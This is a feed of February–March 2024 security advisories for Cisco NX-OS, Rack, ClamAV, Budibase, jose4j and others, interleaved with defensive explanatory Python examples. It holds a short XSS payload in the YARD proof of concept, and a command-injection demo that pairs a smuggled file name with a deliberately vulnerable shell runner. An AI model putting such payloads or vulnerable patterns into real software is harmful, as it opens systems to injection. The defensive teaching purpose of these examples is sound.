28.02.2024 18:00:00cisco[CISCO-SA-NXOS-LLDP-DOS-Z7PNCTGT] Cisco FXOS and NX-OS Software Link Layer Discovery Protocol Denial of Service Vulnerability (medium)A vulnerability in the Link Layer Discovery Protocol (LLDP) feature of Cisco FXOS Software and Cisco NX-OS Software could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition on an affected device.This vulnerability is due to improper handling of specific fields in an LLDP frame. An attacker could exploit this vulnerability by sending a crafted LLDP packet to an interface of an affected device and having an authenticated user retrieve LLDP statistics from the affected device through CLI show commands or Simple Network Management Protocol (SNMP) requests. A successful exploit could allow the attacker to cause the LLDP service to crash and stop running on the affected device. In certain situations, the LLDP crash may result in a reload of the affected device.Note: LLDP is a Layer 2 link protocol. To exploit this vulnerability, an attacker would need to be directly connected to an interface of an affected device, either physically or logically (for example, through a Layer 2 Tunnel configured to transport the LLDP protocol).Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the February 2024 Cisco FXOS and NX-OS Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: February 2024 Semiannual Cisco FXOS and NX-OS Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75059"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NXOS-LLDP-DOS-Z7PNCTGT
28.02.2024 18:00:00cisco[CISCO-SA-NXOS-EBGP-DOS-L3QCWVJ] Cisco NX-OS Software External Border Gateway Protocol Denial of Service Vulnerability (high)A vulnerability in the External Border Gateway Protocol (eBGP) implementation of Cisco NX-OS Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.This vulnerability exists because eBGP traffic is mapped to a shared hardware rate-limiter queue. An attacker could exploit this vulnerability by sending large amounts of network traffic with certain characteristics through an affected device. A successful exploit could allow the attacker to cause eBGP neighbor sessions to be dropped, leading to a DoS condition in the network.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the February 2024 Cisco FXOS and NX-OS Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: February 2024 Semiannual Cisco FXOS and NX-OS Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75059"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NXOS-EBGP-DOS-L3QCWVJ
28.02.2024 18:00:00cisco[CISCO-SA-IPV6-MPLS-DOS-R9YCXKWM] Cisco NX-OS Software MPLS Encapsulated IPv6 Denial of Service Vulnerability (high)A vulnerability with the handling of MPLS traffic for Cisco NX-OS Software could allow an unauthenticated, remote attacker to cause the netstack process to unexpectedly restart, which could cause the device to stop processing network traffic or to reload.This vulnerability is due to lack of proper error checking when processing an ingress MPLS frame. An attacker could exploit this vulnerability by sending a crafted IPv6 packet that is encapsulated within an MPLS frame to an MPLS-enabled interface of the targeted device. A successful exploit could allow the attacker to cause a denial of service (DoS) condition.Note: The IPv6 packet can be generated multiple hops away from the targeted device and then encapsulated within MPLS. The DoS condition may occur when the NX-OS device processes the packet.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the February 2024 Cisco FXOS and NX-OS Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: February 2024 Semiannual Cisco FXOS and NX-OS Software Security Advisory Bundled Publication ["https://sec.cloudapps.cisco.com/security/center/viewErp.x?alertId=ERP-75059"].https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-IPV6-MPLS-DOS-R9YCXKWM
28.02.2024 15:35:43ubuntu[USN-6668-1] python-openstackclient vulnerabilitypython-openstackclient could delete incorrect access rules.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6668-1
28.02.2024 15:27:00ubuntu[USN-6667-1] Cpanel-JSON-XS vulnerabilityCpanel-JSON-XS could be made to crash or expose information if it processed specially crafted data.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6667-1
28.02.2024 15:20:14ubuntu[USN-6666-1] libuv vulnerability (high)libuv could be made to truncate certain hostnames.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6666-1
28.02.2024 15:15:08alpinelinux[ALPINE:CVE-2024-21885] xwayland, xorg-server vulnerability (high)[From CVE-2024-21885] A flaw was found in X.Org server. In the XISendDeviceHierarchyEvent function, it is possible to exceed the allocated array length when certain new device IDs are added to the xXIHierarchyInfo struct. This can trigger a heap buffer overflow condition, which may lead to an application crash or remote code execution in SSH X11 forwarding environments.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-21885
28.02.2024 15:15:08alpinelinux[ALPINE:CVE-2024-21886] xorg-server, xwayland vulnerability (high)[From CVE-2024-21886] A heap buffer overflow flaw was found in the DisableDevice function in the X.Org server. This issue may lead to an application crash or, in some circumstances, remote code execution in SSH X11 forwarding environments.https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-21886
28.02.2024 15:10:23ubuntu[USN-6665-1] Unbound vulnerabilities (high)Several security issues were fixed in Unbound.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6665-1
28.02.2024 10:00:00msrc[MS:CVE-2024-21626] GitHub: CVE-2024-21626 Container breakout through process.cwd trickery and leaked fds (high)https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21626
28.02.2024 02:00:00debian[DSA-5634-1] chromiumsecurity updatehttps://secdb.nttzen.cloud/security-advisory/debian/DSA-5634-1
28.02.2024 02:00:00oraclelinux[ELSA-2024-0956] postgresql:10 security update (important)[10.23-4.0.1]- Resolves: CVE-2024-0985https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0956
28.02.2024 02:00:00oraclelinux[ELSA-2024-0965] unbound security update (important)[1.16.2-5.2]- bind9: KeyTrap - Extreme CPU consumption in DNSSEC validator (CVE-2023-50387)- bind9: Preparing an NSEC3 closest encloser proof can exhaust CPU resources (CVE-2023-50868)https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0965
28.02.2024 02:00:00oraclelinux[ELSA-2024-0977] unbound security update (important)[1.16.2-3.1]- Fix DNSSEC validation vulnerabilities which can lead to DoS in trivially orchestrated attacks (CVE-2023-50387 and CVE-2023-50868)https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0977
29.02.2024 01:16:05rubysec[RUBYSEC:YARD-2024-27285] YARD's default template vulnerable to Cross-site Scripting in generated frames.html (medium)
### Summary

The "frames.html" file within the Yard Doc's generated documentation is vulnerable to Cross-Site Scripting (XSS) attacks due to inadequate sanitization of user input within the JavaScript segment of the "frames.erb" template file.

### Details

The vulnerability stems from mishandling user-controlled data retrieved from the URL hash in the embedded JavaScript code within the "frames.erb" template file. Specifically, the script lacks proper sanitization of the hash data before utilizing it to establish the top-level window's location. This oversight permits an attacker to inject malicious JavaScript payloads through carefully crafted URLs.

Snippet from "frames.erb":

```erb
<script type="text/javascript">
  var match = unescape(window.location.hash).match(/^#!(.+)/);
  var name = match ? match[1] : '<%= url_for_main %>';
  name = name.replace(/^(\w+):\/\//, '').replace(/^\/\//, '');
  window.top.location = name;
</script>
```

### PoC (Proof of Concept)

To exploit this vulnerability:

1. Gain access to the generated Yard Doc.
2. Locate and access the "frames.html" file.
3. Construct a URL containing the malicious payload in the hash segment, for instance: `#!javascript:xss`

### Impact

This XSS vulnerability presents a substantial threat by enabling an attacker to execute arbitrary JavaScript code within the user's session context. Potential ramifications include session hijacking, theft of sensitive data, unauthorized access to user accounts, and defacement of websites. Any user visiting the compromised page is susceptible to exploitation. It is critical to promptly address this vulnerability to mitigate potential harm to users and preserve the application's integrity.

https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:YARD-2024-27285
28.02.2024 19:09:55rustsec[RUSTSEC-2024-0017] Non-idiomatic use of iterators leads to use after free
Code that attempts to use an item (e.g., a row) returned by an iterator after the iterator has advanced to the next item will be accessing freed memory and experience undefined behaviour. Code that uses the item and then advances the iterator is unaffected. This problem has always existed.

This is a use-after-free bug, so it's rated high severity. If your code uses a pre-3.0.0 version of cassandra-rs, and uses an item returned by a cassandra-rs iterator after calling `next()` on that iterator, then it is vulnerable. However, such code will almost always fail immediately - so we believe it is unlikely that any code using this pattern would have reached production. For peace of mind, we recommend you upgrade anyway.

## Patches

The problem has been fixed in version 3.0.0 (commit 299e6ac50f87eb2823a373baec37b590a74994ee). Users should upgrade to ensure their code cannot use the problematic pattern. There is an upgrade guide in the project README.

## Workarounds

Ensure all usage fits the expected pattern. For example, use `get_first_row()` rather than an iterator, or completely process an item before advancing the iterator with `next()`.

https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0017
28.02.2024 17:09:26almalinux[ALSA-2024:0967] opensc security update (moderate)opensc security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0967
28.02.2024 16:50:38almalinux[ALSA-2024:0975] postgresql:13 security update (important)postgresql:13 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0975
28.02.2024 16:58:47almalinux[ALSA-2024:0974] postgresql:12 security update (important)postgresql:12 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0974
28.02.2024 17:04:35almalinux[ALSA-2024:0973] postgresql:15 security update (important)postgresql:15 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0973
28.02.2024 17:24:26almalinux[ALSA-2024:0965] unbound security update (important)unbound security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0965
28.02.2024 17:41:58almalinux[ALSA-2024:0956] postgresql:10 security update (important)postgresql:10 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0956
28.02.2024 17:18:29almalinux[ALSA-2024:0966] opensc security update (moderate)opensc security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0966
28.02.2024 17:29:38almalinux[ALSA-2024:0964] thunderbird security update (important)thunderbird security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0964
28.02.2024 17:49:38almalinux[ALSA-2024:0955] firefox security update (important)firefox security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0955
28.02.2024 16:41:33almalinux[ALSA-2024:0977] unbound security update (important)unbound security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0977
28.02.2024 17:36:17almalinux[ALSA-2024:0963] thunderbird security update (important)thunderbird security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0963
28.02.2024 02:00:00freebsd[FREEBSD:3DADA2D5-4E17-4E39-97DD-14FDBD4356FB] null -- Routinator terminates when RTR connection is reset too quickly after opening (high)sep@nlnetlabs.nl reports: Due to a mistake in error checking, Routinator will terminate when an incoming RTR connection is reset by the peer too quickly after opening.https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:3DADA2D5-4E17-4E39-97DD-14FDBD4356FB
28.02.2024 18:18:57almalinux[ALSA-2024:0950] postgresql:15 security update (important)postgresql:15 security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0950
28.02.2024 17:59:36almalinux[ALSA-2024:0952] firefox security update (important)firefox security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0952
28.02.2024 18:06:24almalinux[ALSA-2024:0951] postgresql security update (important)postgresql security updatehttps://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0951
29.02.2024 01:57:11rubysec[RUBYSEC:RACK-2024-25126] Denial of Service Vulnerability in Rack Content-Type Parsing
There is a possible denial of service vulnerability in the content type parsing component of Rack. This vulnerability has been assigned the CVE identifier CVE-2024-25126.

Versions Affected: >= 0.4
Not affected: < 0.4
Fixed Versions: 3.0.9.1, 2.2.8.1

# Impact

Carefully crafted content type headers can cause Rack’s media type parser to take much longer than expected, leading to a possible denial of service vulnerability.

Impacted code will use Rack’s media type parser to parse content type headers. This code will look like below:

```ruby
request.media_type

## OR

request.media_type_params

## OR

Rack::MediaType.type(content_type)
```

Some frameworks (including Rails) call this code internally, so upgrading is recommended!

All users running an affected release should either upgrade or use one of the workarounds immediately.

# Releases

The fixed releases are available at the normal locations.

# Workarounds

There are no feasible workarounds for this issue.

https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:RACK-2024-25126
29.02.2024 01:57:11 | rubysec | [RUBYSEC:RACK-2024-26141] Possible DoS Vulnerability with Range Header in Rack
There is a possible DoS vulnerability relating to the Range request header in Rack. This vulnerability has been assigned the CVE identifier CVE-2024-26141.
Versions Affected: >= 1.3.0. Not affected: < 1.3.0. Fixed Versions: 3.0.9.1, 2.2.8.1
# Impact
Carefully crafted Range headers can cause a server to respond with an unexpectedly large response. Responding with such large responses could lead to a denial of service issue.
Vulnerable applications will use the `Rack::File` middleware or the `Rack::Utils.byte_ranges` methods (this includes Rails applications).
# Releases
The fixed releases are available at the normal locations.
# Workarounds
There are no feasible workarounds for this issue.
https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:RACK-2024-26141
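The Range-header entry above describes the amplification class (many overlapping byte ranges, each cheap to request, each expanding into a slice of the file) but not what a bounded parser looks like. The following is an added illustration written for this page, not Rack's `byte_ranges` code, and the two limits it enforces (`MAX_RANGES`, `MAX_TOTAL_FACTOR`) are assumed policy values chosen for the example rather than numbers taken from the Rack fix. It parses a `Range` header for a resource of a given size, skips unsatisfiable ranges as RFC 9110 allows, and falls back to serving the whole resource once when the header is malformed, carries too many ranges, or would cost more bytes than the resource itself.

```python
import re

# Assumptions for this illustration (not Rack's values): at most MAX_RANGES
# ranges per request, and one request may not cost more than
# MAX_TOTAL_FACTOR copies of the resource.
MAX_RANGES = 10
MAX_TOTAL_FACTOR = 1

# One range-spec: "first-last", "first-" or "-suffix_length"
_SPEC = re.compile(r"^\s*(\d*)\s*-\s*(\d*)\s*$")


def parse_byte_ranges(header, size):
    """Parse an HTTP Range header for a resource of `size` bytes.

    Returns a list of inclusive (first, last) tuples to serve, or None when
    the header must be ignored and the whole resource served once instead:
    malformed syntax, no satisfiable range, more than MAX_RANGES ranges, or
    ranges whose combined length exceeds MAX_TOTAL_FACTOR * size.
    """
    if not header or not header.startswith("bytes="):
        return None
    specs = header[len("bytes="):].split(",")
    if len(specs) > MAX_RANGES:
        return None  # refuse before doing any per-range work
    ranges = []
    for spec in specs:
        m = _SPEC.match(spec)
        if m is None:
            return None
        first, last = m.group(1), m.group(2)
        if first == "":
            if last == "":
                return None  # "-" alone is not a range
            n = int(last)  # suffix range: the last n bytes
            if n == 0:
                continue  # zero-length suffix is unsatisfiable
            first_i, last_i = max(size - n, 0), size - 1
        else:
            first_i = int(first)
            last_i = size - 1 if last == "" else min(int(last), size - 1)
        if first_i >= size or first_i > last_i:
            continue  # unsatisfiable range; skip it
        ranges.append((first_i, last_i))
    if not ranges:
        return None
    total = sum(last - first + 1 for first, last in ranges)
    if total > MAX_TOTAL_FACTOR * size:
        return None  # amplification: refuse to send more than one full copy
    return ranges


def response_cost(header, size):
    """Bytes a server using parse_byte_ranges would send for this header
    (multipart framing ignored); a rejected header costs one full copy."""
    ranges = parse_byte_ranges(header, size)
    if ranges is None:
        return size
    return sum(last - first + 1 for first, last in ranges)
```

With these limits a header of the form `bytes=0-999,0-999,...` against a 1000-byte file costs at most 1000 bytes, whereas an unbounded parser would happily serve every repeated range. Whether to answer a rejected header with the full body (as here) or with a 416 is a product decision; the important property is that the cost no longer scales with the number of ranges the client supplies.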
29.02.2024 01:57:11 | rubysec | [RUBYSEC:RACK-2024-26146] Possible Denial of Service Vulnerability in Rack Header Parsing
There is a possible denial of service vulnerability in the header parsing routines in Rack. This vulnerability has been assigned the CVE identifier CVE-2024-26146.
Versions Affected: All. Not affected: None. Fixed Versions: 2.0.9.4, 2.1.4.4, 2.2.8.1, 3.0.9.1
# Impact
Carefully crafted headers can cause header parsing in Rack to take longer than expected, resulting in a possible denial of service issue. `Accept` and `Forwarded` headers are impacted.
Ruby 3.2 has mitigations for this problem, so Rack applications using Ruby 3.2 or newer are unaffected.
# Releases
The fixed releases are available at the normal locations.
# Workarounds
There are no feasible workarounds for this issue.
https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:RACK-2024-26146
29.02.2024 22:10:04 | npm | [NPM:GHSA-9VX6-7XXF-X967] OpenZeppelin Contracts base64 encoding may read from potentially dirty memory (low)
### Impact
The `Base64.encode` function encodes a `bytes` input by iterating over it in chunks of 3 bytes. When this input is not a multiple of 3, the last iteration may read parts of the memory that are beyond the input buffer.
Although the `encode` function pads the output for these cases, up to 4 bits of data are kept between the encoding and padding, corrupting the output if these bits were dirty (i.e. memory after the input is not 0). These conditions are more frequent in the following scenarios:
- A `bytes memory` struct is allocated just after the input and the first bytes of it are non-zero.
- The memory pointer is set to a non-empty memory location before allocating the input.
Developers should evaluate whether the extra bits can be maliciously manipulated by an attacker.
### Patches
Upgrade to 5.0.2 or 4.9.6.
### References
This issue was reported by the Independent Security Researcher Riley Holterhus through Immunefi (@rileyholterhus on X).
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-9VX6-7XXF-X967
29.02.2024 22:04:54 | msrc | [MS:CVE-2024-1939] Chromium: CVE-2024-1939 Type Confusion in V8 | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-1939
29.02.2024 22:04:50 | msrc | [MS:CVE-2024-1938] Chromium: CVE-2024-1938 Type Confusion in V8 | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-1938
29.02.2024 18:02:17 | ubuntu | [USN-6671-1] php-nyholm-psr7 vulnerability (high) | A header injection issue was fixed in php-nyholm-psr7. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6671-1
29.02.2024 17:52:29 | ubuntu | [USN-6670-1] php-guzzlehttp-psr7 vulnerabilities (high) | Several header injection issues were fixed in php-guzzlehttp-psr7. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6670-1
29.02.2024 16:24:58 | ubuntu | [USN-6653-3] Linux kernel (Low Latency) vulnerabilities (high) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6653-3
29.02.2024 16:24:04 | ubuntu | [USN-6651-3] Linux kernel (StarFive) vulnerabilities (high) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6651-3
29.02.2024 16:23:18 | ubuntu | [USN-6647-2] Linux kernel (Azure) vulnerabilities (high) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6647-2
29.02.2024 10:00:00 | msrc | [MS:CVE-2024-26196] Microsoft Edge for Android (Chromium-based) Information Disclosure Vulnerability (low) | | https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26196
29.02.2024 22:10:54 | maven | [MAVEN:GHSA-3HRR-XWVG-HXVR] Keycloak DoS via account lockout (low) | A flaw was found in Keycloak. In certain conditions, this issue may allow a remote unauthenticated attacker to block other accounts from logging in. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-3HRR-XWVG-HXVR
29.02.2024 22:10:46 | maven | [MAVEN:GHSA-6QVW-249J-H44C] jose4j denial of service via specifically crafted JWE (moderate) | The jose4j component before 0.9.4 for Java allows attackers to cause a denial of service (CPU consumption) via a large p2c (aka PBES2 Count) value. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-6QVW-249J-H44C
29.02.2024 03:06:24 | go | [GO-2024-2554] Path traversal in helm.sh/helm/v3 (medium) | | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2554
29.02.2024 02:00:00 | cisa | [CISA-2024:0229] CISA Adds One Known Exploited Vulnerability to Catalog (high) | CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. | https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0229
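The jose4j entry above is a reminder that the PBES2 `p2c` header is attacker-controlled input that directly sets the PBKDF2 iteration count, so a decrypting party must cap it before it spends any CPU. The following is an added example written for this page in Python, not jose4j's Java code: it parses the protected header of a compact JWE, validates the PBES2 parameters against an assumed local maximum (`MAX_P2C = 100_000` is a policy choice for the example, not a value from jose4j 0.9.4), and only then derives the key-encryption key with the salt construction from RFC 7518 section 4.8.1.1. The `make_test_jwe` helper builds constructed input whose only meaningful part is the header.

```python
import base64
import hashlib
import json

# Assumed policy for this illustration: RFC 7518 recommends at least 1000
# iterations; the upper bound is a local choice, not a jose4j value.
MIN_P2C = 1000
MAX_P2C = 100_000

# PBES2 alg -> (PBKDF2 PRF, derived key length in bytes), RFC 7518 section 4.8
_PBES2_ALGS = {
    "PBES2-HS256+A128KW": ("sha256", 16),
    "PBES2-HS384+A192KW": ("sha384", 24),
    "PBES2-HS512+A256KW": ("sha512", 32),
}


def _b64url_decode(s):
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _b64url_encode(b):
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode("ascii")


def check_pbes2_header(compact_jwe, max_p2c=MAX_P2C):
    """Parse the protected header of a compact JWE and validate the PBES2
    parameters *before* any key derivation runs. Returns the header dict;
    raises ValueError for an unknown PBES2 alg, an invalid p2s, or a p2c
    that is missing, non-integer, below MIN_P2C or above max_p2c."""
    header = json.loads(_b64url_decode(compact_jwe.split(".", 1)[0]))
    alg = header.get("alg")
    if not isinstance(alg, str) or not alg.startswith("PBES2"):
        return header  # not password-based key wrapping; nothing to cap
    if alg not in _PBES2_ALGS:
        raise ValueError("unsupported PBES2 alg %r" % alg)
    p2c = header.get("p2c")
    if isinstance(p2c, bool) or not isinstance(p2c, int) or p2c < MIN_P2C:
        raise ValueError("p2c must be an integer >= %d" % MIN_P2C)
    if p2c > max_p2c:
        raise ValueError("p2c=%d exceeds the allowed maximum %d" % (p2c, max_p2c))
    p2s = header.get("p2s")
    if not isinstance(p2s, str) or len(_b64url_decode(p2s)) < 8:
        raise ValueError("p2s must be a base64url salt of at least 8 bytes")
    return header


def pbes2_header_allowed(compact_jwe, max_p2c=MAX_P2C):
    """Boolean convenience wrapper around check_pbes2_header."""
    try:
        check_pbes2_header(compact_jwe, max_p2c)
        return True
    except ValueError:
        return False


def derive_pbes2_kek(password, header):
    """Derive the PBES2 key-encryption key for a header that already passed
    check_pbes2_header: PBKDF2 with salt = alg || 0x00 || p2s."""
    prf, key_len = _PBES2_ALGS[header["alg"]]
    salt = header["alg"].encode("utf-8") + b"\x00" + _b64url_decode(header["p2s"])
    return hashlib.pbkdf2_hmac(prf, password.encode("utf-8"), salt, header["p2c"], key_len)


def make_test_jwe(alg, p2c, p2s=b"constructed-salt"):
    """Constructed input for the example: a compact JWE whose other four
    segments are empty, so only the protected header is meaningful."""
    header = {"alg": alg, "enc": "A128GCM", "p2c": p2c, "p2s": _b64url_encode(p2s)}
    return _b64url_encode(json.dumps(header).encode("utf-8")) + "...."
```

The cap belongs in the header check, not in the key-unwrap code path: by the time PBKDF2 has started, a billion-iteration request has already won. Libraries that expose a configurable maximum (jose4j 0.9.4 and later do, per the advisory) should have that maximum set to the iteration count the application itself uses for encryption, with a small margin.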
29.02.2024 01:58:01 | go | [GO-2022-0427] Unprotected file upload in github.com/swaggo/http-swagger (high) | The httpSwagger package's HTTP handler provides WebDAV read/write access to an in-memory filesystem. An attacker can exploit this to cause memory exhaustion by uploading many files, XSS attacks by uploading malicious files, or other unexpected behaviors. | https://secdb.nttzen.cloud/security-advisory/go/GO-2022-0427
29.02.2024 02:00:00 | freebsd | [FREEBSD:3567456A-6B17-41F7-BA7F-5CD3EFB2B7C9] electron{27,28} -- Use after free in Mojo | Electron developers report: This update fixes the following vulnerability: Security: backported fix for CVE-2024-1670. | https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:3567456A-6B17-41F7-BA7F-5CD3EFB2B7C9
29.02.2024 02:00:00 | freebsd | [FREEBSD:31BB1B8D-D6DC-11EE-86BB-A8A1599412C6] chromium -- multiple security fixes | Chrome Releases reports: This update includes 4 security fixes: [324596281] High CVE-2024-1938: Type Confusion in V8. Reported by 5f46f4ee2e17957ba7b39897fb376be8 on 2024-02-11. [323694592] High CVE-2024-1939: Type Confusion in V8. Reported by Bohan Liu (@P4nda20371774) of Tencent Security Xuanwu Lab on 2024-02-05. | https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:31BB1B8D-D6DC-11EE-86BB-A8A1599412C6
01.03.2024 23:15:07 | alpinelinux | [ALPINE:CVE-2024-20328] clamav vulnerability (medium) | [From CVE-2024-20328] A vulnerability in the VirusEvent feature of ClamAV could allow a local attacker to inject arbitrary commands with the privileges of the application service account. The vulnerability is due to unsafe handling of file names. A local attacker could exploit this vulnerability by supplying a file name containing command-line sequences. When processed on a system using configuration options for the VirusEvent feature, the attacker could cause the application to execute arbitrary commands. ClamAV has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. | https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-20328
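The ClamAV entry above describes the classic event-hook injection: a scanner substitutes an attacker-chosen file name into a command template and then hands the resulting string to a shell. The block below is an added illustration of that class written for this page in Python; it is not ClamAV's code and does not reproduce the actual CVE-2024-20328 payload. The template syntax (`%v` for the signature name, `%f` for the file name) is modelled on the style of a `VirusEvent` line and is an assumption of the example, as is the constructed file name. The vulnerable variant substitutes first and runs through `/bin/sh`; the hardened variant splits the template into an argv list first, substitutes into each argument separately, and executes without a shell, so the file name can never become a second command.

```python
import shlex
import subprocess

# Constructed sample input: a detection whose file name carries shell metacharacters.
SAMPLE_VIRUS_NAME = "Eicar-Test-Signature"
SAMPLE_FILE_NAME = "report.pdf; echo INJECTED"

# Hypothetical event template in the style of a VirusEvent line (assumption of
# this example): %v is the signature name, %f the file name. "echo" stands in
# for whatever notification command an operator would configure.
EVENT_TEMPLATE = "echo %v %f"


def _substitute(text, virus, path):
    return text.replace("%v", virus).replace("%f", path)


def run_event_vulnerable(template, virus, path):
    """Substitute into the template, then run the whole string via /bin/sh.
    Any shell-significant characters in `path` are interpreted as syntax."""
    command = _substitute(template, virus, path)
    out = subprocess.run(command, shell=True, capture_output=True, text=True, check=False)
    return out.stdout.splitlines()


def run_event_safe(template, virus, path):
    """Split the *template* with shell quoting rules before substitution, then
    substitute into each already-separated argument and exec without a shell.
    The file name stays one argv element whatever it contains."""
    argv = [_substitute(arg, virus, path) for arg in shlex.split(template)]
    out = subprocess.run(argv, shell=False, capture_output=True, text=True, check=False)
    return out.stdout.splitlines()


if __name__ == "__main__":
    print("vulnerable:", run_event_vulnerable(EVENT_TEMPLATE, SAMPLE_VIRUS_NAME, SAMPLE_FILE_NAME))
    print("safe:      ", run_event_safe(EVENT_TEMPLATE, SAMPLE_VIRUS_NAME, SAMPLE_FILE_NAME))
```

Run stand-alone, the vulnerable path prints two lines (the second produced by the injected `echo`), while the safe path prints a single line containing the file name verbatim. The same rule applies to any hook that an unprivileged user can influence through file names, mail headers or user-agent strings: build argv, never a command string.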
01.03.2024 22:11:11 | npm | [NPM:GHSA-5MHG-WV8W-P59J] Directus version number disclosure (moderate)
### Impact
Currently the exact Directus version number is being shipped in compiled JS bundles which are accessible without authentication. With this information a malicious attacker can trivially look for known vulnerabilities in Directus core or any of its shipped dependencies in that specific running version.
### Patches
The problem has been resolved in versions 10.8.3 and newer.
### Workarounds
None
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-5MHG-WV8W-P59J
01.03.2024 22:09:00 | npm | [NPM:GHSA-4G2X-VQ5P-5VJ6] Budibase affected by VM2 Constructor Escape Vulnerability (critical)
### Impact
Previously, budibase used a library called `vm2` for code execution inside the Budibase builder and apps, such as the UI below for configuring bindings in the design section.
![Screenshot 2024-03-01 at 13 50 16](https://github.com/Budibase/budibase/assets/11256663/5f049b64-cd99-48fd-a184-644cd312c82e)
Due to a [vulnerability in vm2](https://github.com/advisories/GHSA-cchq-frgv-rjh5), any environment that executed the code server side (automations and column formulas) was susceptible to this vulnerability, allowing users to escape the sandbox provided by `vm2`, and to expose server side variables such as `process.env`. It's recommended by the authors of `vm2` themselves that you should move to another solution for remote JS execution due to this vulnerability.
### Patches
We moved our entire JS sandbox infrastructure over to `isolated-vm`, a much more secure and recommended library for remote code execution, in 2.20.0. This also comes with a performance benefit in the way we cache and execute your JS server side. The budibase cloud platform has been patched already and is not running `vm2`, but self host users will need to manage the updates by themselves.
If you are a self hosted user, you can take the following steps to reproduce the exploit and to verify if your installation is currently affected.
Create a new formula column on one of your tables in the data section with the following configuration.
![Screenshot 2024-03-01 at 14 04 28](https://github.com/Budibase/budibase/assets/11256663/0f8bc19b-9e44-4e95-ab4e-6ef6278eea34)
Add the following JS function to the formula and save.
![Screenshot 2024-03-01 at 14 05 19](https://github.com/Budibase/budibase/assets/11256663/1d0c9705-1a88-49b0-93e0-f385a04b5c25)
If your installation is vulnerable, when the formula evaluates you will be able to see the printed `process.env` in your new formula field. If not, your installation is not affected.
### Workarounds
There is no workaround at this time for any budibase app that uses JS. You must fully migrate post version 2.20.0 to patch the vulnerability.
### References
- https://github.com/advisories/GHSA-cchq-frgv-rjh5
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-4G2X-VQ5P-5VJ6
01.03.2024 22:08:24 | npm | [NPM:GHSA-6927-3VR9-FXF2] ZDI-CAN-19105: Parse Server literalizeRegexPart SQL Injection (critical)
### Impact
This vulnerability allows SQL injection when Parse Server is configured to use the PostgreSQL database.
### Patches
The algorithm to detect SQL injection has been improved.
### Workarounds
None.
### References
